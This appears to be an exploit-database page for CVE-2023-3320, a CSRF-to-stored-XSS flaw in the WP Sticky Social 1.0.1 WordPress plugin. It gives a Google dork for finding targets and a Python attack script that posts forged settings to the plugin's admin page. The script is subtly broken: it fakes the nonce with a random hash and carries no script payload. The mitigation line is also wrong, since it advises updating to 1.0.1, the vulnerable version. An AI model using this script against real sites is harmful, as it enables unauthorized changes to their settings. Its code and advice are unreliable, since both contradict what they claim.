header-logo
Suggest Exploit
vendor:
WP Sticky Social
by:
Amirhossein Bahramizadeh
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: WP Sticky Social
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: YES
Related CWE: CVE-2023-3320
CPE: a:wp_sticky_social_project:wp_sticky_social:1.0.1
Metasploit:
Other Scripts:
Platforms Tested: Windows, Linux
2023

WP Sticky Social 1.0.1 – Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)

The WP Sticky Social plugin version 1.0.1 is vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) attacks. An attacker can exploit this vulnerability to perform malicious actions on behalf of an authenticated user and inject arbitrary script code into the affected site.

Mitigation:

Update to the latest version of WP Sticky Social plugin (1.0.1) or remove the plugin if not necessary. Ensure that all plugins and themes used in WordPress are regularly updated to prevent security vulnerabilities.
Source

Exploit-DB raw data:

# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
#  Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")

Navigation

Suggest Exploit

Services By CQR